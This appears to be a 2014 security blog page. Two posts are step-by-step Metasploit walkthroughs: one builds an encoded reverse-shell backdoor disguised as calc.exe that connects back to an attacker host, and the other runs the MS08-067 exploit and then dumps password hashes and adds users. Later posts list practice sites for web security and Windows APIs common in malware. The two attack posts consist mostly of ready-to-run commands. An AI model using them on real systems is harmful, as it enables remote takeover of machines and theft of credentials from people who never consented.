Thursday, May 29, 2014

Hack All Windows OS's (Windows 8/7/Vista/XP) using Metasploit Backdoors

This blog discusses how to compromise Windows 8, Windows 7, Windows Vista, Windows XP etc. using Metasploit backdoors.


Copy created backdoor to victims machine using USB, Shares etc.

When victim executes the malicious binary, it connects back to attackers machine.

Commands to create backdoor
msfpayload -h
# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=8888 R > cal_pld.exe
msfencode -h
# msfencode -e x86/shikata_ga_nai -c 3 -t exe -i calc_pld.exe -x /root/calc.exe -o calc_backdoor.exe

Commands to create handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 8888
exploit

If everything goes fine, Metasploit will start handler and waits for connections from victim's. Once victim executes the binary, successful exploitation will create a Meterpreter session.

http://blog.disects.com/2014/05/metasploit-gaining-access-using-ms08.html

Posted by at 1 comment:
Labels: , ,

Metasploit: Gaining Access using MS08-067 (CVE-2008-4250)

Setup details
Victim(Windows XP SP3): 192.168.56.101
Attack(Kali Linux):             192.168.56.102

Use below commands to launch an exploit.
search command can be used to search desired exploit, payload etc.
use      to use required exploit
set       set options accordingly (LHOST, LPORT, RHOST,RPORT,PAYLOAD etc.)
run/exploit    launch exploit
meterpreter  shell to execute commands in the context of victim
msf> search smb
msf> use exploit/windows/smb/ms08_067_netapi
msf> show options
msf> set RHOST 192.168.56.102
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> exploit

Check if all the options related to the exploit are set properly.
Launch the exploit once all the parameter are set properly

Exploit is successful and we are already on meterpreter prompt.

Details of the victim Operating System

Once we have access to the victim there are many post exploitation techniques like Privilege Escalation, Maintaining Access, Clearing Logs etc.
meterpreter> screenshot
meterpreter> migrate
To add users
meterpreter> use incognito
meterpreter> help incognito
Dump Users and LM/NTLM hashes
meterpreter> hashdump

Same steps can be followed for different exploits. To use different exploit execute below command and set options accordingly.
use exploit/windows/browser/ie_aurora

Other useful blogs
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Vulnerability details
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

Posted by at 1 comment:
Labels: , ,

Monday, May 5, 2014

Applications and Live Websites to learn Web Application Security

Below websites can be used to learn Web Application Security of live websites. These web sites are created for learning purposes.

http://crackme.cenzic.com/Kelev/view/home.php
http://google-gruyere.appspot.com/
http://zero.webappsecurity.com/
http://testfire.net/
http://suif.stanford.edu/~livshits/work/securibench/index.html
http://www.mcafee.com/us/downloads/free-tools/index.aspx
http://testaspnet.vulnweb.com/
http://www.badstore.net/

Below applications can be used to learn Web Application Security concepts
OWASP Webgoat
OWASP SiteGenerator
DVWA
Mutillidae
Posted by at No comments:
Labels:

Friday, May 2, 2014

Windows API's used by Malware

Below Windows API's are frequently used by Malware, though this is not an exhaustive list.

Anti-debugging Techniques
kerne32.CloseHandle
kernel32.GetTickCount
the byte at offset 0x02(IsDebugged) in the PEB is set(debugged) or not
Check for the NtGlobalFlags at offset 0x68 in the PEB

kernel32.GetProcAdddress
kernel32.LoadLibraryA
kernel32.OpenProcess - get handle of a given process
kernel32.VirutalAllocEx - reserves within the virtual address space of a process
kernel32.CreateRemoteThread - create Thread (inside a process)

FindResource
LockResource
ShellExecute
GetThreadContext
CreateProcessA
ReadProcessMemory
WriteProcessMemory
NtQueueApcThread
CreateToolhelp32Snapshot
Thread32First
Thread32Next
SetWindowsHookEx
NtSetSystemInformation
CreateFile

File handling functions
Registry handling function
Network communication API's

Tutorial for learning Malware analysis
https://noppa.aalto.fi/noppa/kurssi/t-110.6220/luennot
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)